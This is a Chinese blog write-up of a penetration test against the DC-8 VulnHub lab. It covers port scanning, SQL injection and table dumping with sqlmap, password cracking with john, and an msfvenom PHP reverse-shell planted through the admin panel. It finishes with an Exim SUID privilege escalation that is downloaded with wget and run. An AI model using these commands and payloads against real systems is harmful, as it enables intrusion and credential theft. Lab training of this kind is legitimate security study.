DC系列靶场---DC 8靶场的渗透测试

于 2024-08-09 08:45:00 发布
阅读量938 收藏 11
点赞数 22
分类专栏: DC系列靶场 文章标签: android 安全 web安全 linux 网络 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhouA0221/article/details/141021637
版权

信息收集

地址探测

使用arpscan对目标主机进行地址探测

arp-can -l I eth0

端口扫描

nmap -sS -sV -T4 -p- -O 172.30.1.131

目标主机开启了80端口和22端口。

http探测

打开网站看到并没有什么提示

      

那就随便点点看看网站有没有交互式的地方

漏洞探测及利用

漏洞查找

在点网站的细节时发现URL发生了改变,?nid=3,问号传参,这种URL极有可能存在SQL注入漏洞。

初步验证是否有SQL注入漏洞,直接在URL后边加个 ‘ 如果报错那就是被系统执行了,没有进行过滤

加上 ‘ 之后发现报错了,通过报错还看到了查询语句。

SQL注入

Sqlmap扫描注入点

sqlmap -u "172.30.1.131/?nid=3"

查看这里存在一个布尔盲注直接爆破数据库

sqlmap -u "172.30.1.131/?nid=3" --dbs

爆破到两个数据库,关于网站那就是d7db这个库

sqlmap "172.30.1.131/?nid=3" -D d7db --tables

爆破出一大堆数据表,我们关注的肯定是users用户这个表这个表

指定users这个表,列出表中的列

sqlmap -u 172.30.1.131/?nid=2 --dbs -D d7db --tables -T users --columns

爆破出表中的列后,指定列再爆破列中的字段

sqlmap -u 172.30.1.131/?nid=2 --dbs  -D d7db --tables -T users --columns -C name,pass --dump

得到admin、john这两个用户还有加密的密码

将这两个用户名和加密的密码,写入到一个文本文件中。

破解密码

直接使用john进行破解密码

john a.txt

得到john用户的密码,username:john  passwd:turtlu

通过目录枚举得知网站的登录地址为:

http://172.30.1.131/user

生成木马

使用msfvenom生成木马

msfvenom -p php/meterpreter/reverse_tcp LHOST 172.30.1.20 LPORT 2226 -f raw

写入木马

登录到后台,找到新建一个php文件

将我们生成的木马复制到这里,

选择php代码

往下滑,这里只是保存,并不是提交。

在这里填好信息直接提交。这样我们就可以进行连接了。

获取shell

使用msf侦听,这里的LHOST是kali主机,端口要和木马一致

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 172.30.1.20
set lport 2226
exploit

执行后等待连接

shell

python -c 'import pty;pty.spawn("/bin/bash")'

输入shell获取到目标主机的shell,使用python得到交互式shell

提权

信息收集

查看账户文件

cat /etc/passwd

并没有什么有用的信息

查看sudo授权

sudo -l

密码也不对

查看SUID文件

find / -perm -4000 -type f 2>/dev/null

这里看到一个exim4的程序

Exim提权

Exim是一个MTA(Mail Transfer Agent,邮件传输代理)服务器软件,该软件基于GPL协议开发,是一款开源软件。该软件主要运行于类UNIX系统。通常该软件会与Dovecot或Courier等软件搭配使用。Exim同时也是“进出口”(Export-Import)的英文缩写。

Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers

漏洞查找网站

将文件镜像到本地

searchsploit -m  linux/local/46996.sh

使用python搭建一个建议的web服务器

python -m http.server 8888        (python3)

下载

wget http://192.168.195.76:8888/46996.sh​编辑

dos2unix 46997.sh给文件更改为unix文件

给文件加入权限

chmod 777 46996.sh

运行脚本 -m netcat简称nc

nc 127.0.0.1 31337

等待连接。

拿到flag

总结

1、在url后面看到?也就是传参这种,很有可能存在SQL注入

2、通过这个URL加'看看是否报错,如果报错就是被系统执行了,那就是存在

3、拿到用户名和密码之后使用john进行爆破密码,爆出密码后登录到后台

4、使用msfvenom生成木马后要先保存后再提交

5、拿到shell后进行信息收集,Exim这个程序然后搜索这个程序的漏洞。通过这个程序漏洞提权

白帽子二三
关注
专栏目录
DC-8靶场
qq_49518993的博客
08-27 904
DC-8靶场
DC系列漏洞靶场-渗透测试学习复现(DC-1)
W983079520的博客
11-01 2762
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的! DC系列靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip(DC后的数字可以换成1-8中任意一个) DC-1是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 DC-1提权关键词:find
DC8_靶场训练
JSH_CDX的博客
03-31 1024
本篇文章是对DC靶场的实战,也是通关过程,希望这对你会有帮助
vulnhub靶场DC-8
qq_58091216的博客
01-14 1056
我们查看node,我们可以看到3行蓝色的字,我们一个一个进行访问,最后发现这里就只加了参数nid,非常可疑,可能存在有SQL注入、xss等漏洞。将提交重定向行Confirmation page(确认页面)给勾上,然后滑下点保存,联系随便填入联系表单,点击发送,触发PHP代码。我们可以看到name和pass,我们想到前面的登录页面,我们进行爆破即可。我们可以看到报错了,可能存在报错注入,我们使用sqlmap进行测试。我们看到2个用户名和密码,但是密码是加密的,我们进行解密。
DC-8靶场实战
qq_42754807的博客
03-21 772
DC-9靶场实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
DC系列漏洞靶场-渗透测试学习复现(DC-8)
W983079520的博客
12-10 1922
DC-8是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了shell反弹和exim提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.149为DC-8靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。
vuInhub靶场实战系列-DC-6实战
最新发布
05-29
vuInhub靶场实战系列-DC-6实战
vulnhub DC8 靶场练习
鸥鹭忘机
09-03 1111
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第8台,下载地址为https://www.vulnhub.com/entry/dc-8,367/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机的总体难度不大,利用的漏洞也是常见的,只要细心观察就可以发现这个突破口。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-6靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。
DC-8 靶场夺旗
猎荒者
03-02 655
当你凝视深远的时候,深渊也凝视着你 环境准备 Kali(IP:10.10.16.128) DC-8 虚拟机 NAT 网络连接 主机发现 nmap -sP 10.10.16.0/24 端口扫描 nmap -A -v -sS -sV -p- -T4 10.10.16.145 目录爆破 dirb http://10.10.16.145 发现一个 robots.txt 文件 访问 rob...
靶场练习第十六天~vulnhub靶场dc-8
qq_57976347的博客
02-15 386
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-8.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -p- 192.168.101.121 2.网站的信息收集 (1)靶机开放了80端口,先访问
DC-8靶场渗透】
一纸荒芜的博客
08-13 2108
dc-8靶场
靶机渗透 -- DC-8
qq_42785117的博客
09-28 2190
dc-8靶机下载地址:点这里 环境: kali ip: 192.168.157.124 靶机ip:192.168.157.143 渗透阶段 首先寻找靶机IP,以及扫描靶机的端口信息 使用cmsmap扫描,确定CMS名称以及版本 浏览网站,发现疑似注入点 使用sqlmap爆库得到数据 在user表中查询到账户密码 使用john工具进行破解,得到登录密码(这里用户名叫做john也是一种提示...
DC-8靶场下载及渗透实战详细过程(DC靶场系列
金 帛的博客
08-08 3655
dc-8靶场详细渗透过程
Vulhub-DC-8靶场实战攻略
weixin_51339377的博客
03-17 982
测试网页中的Details 发现可以通过Get传参数 加上单引号以后出现报错 说明存在SQL注入的漏洞 通过sqlmap进行尝试 sqlmap -uhttp://192.168.206.142/?nid=1 -D d7db --tables sqlmap -u http://192.168.206.142/?nid=1 -D d7db -T users --columns sqlmap -u http://192.168.206.142...
记录一次vulnhub靶场——DC8的渗透测试过程
旺仔Sec&blog
03-10 803
第一个命令 find / -perm -u=s -type f 2>/dev/null 使用 -perm -u=s 来查找具有 SUID 权限设置的文件,而第二个命令 find / -user root -perm -4000 -print 2>/dev/null 使用 -user root -perm -4000 来查找属主为 root 并且具有 SUID 权限设置的文件。,使用御剑扫描出robots.txt,并发现后台管理员登录的地址,使用john用户名与爆破出的密码成功登录后台。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽子二三

您的鼓励是我最大的前进动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值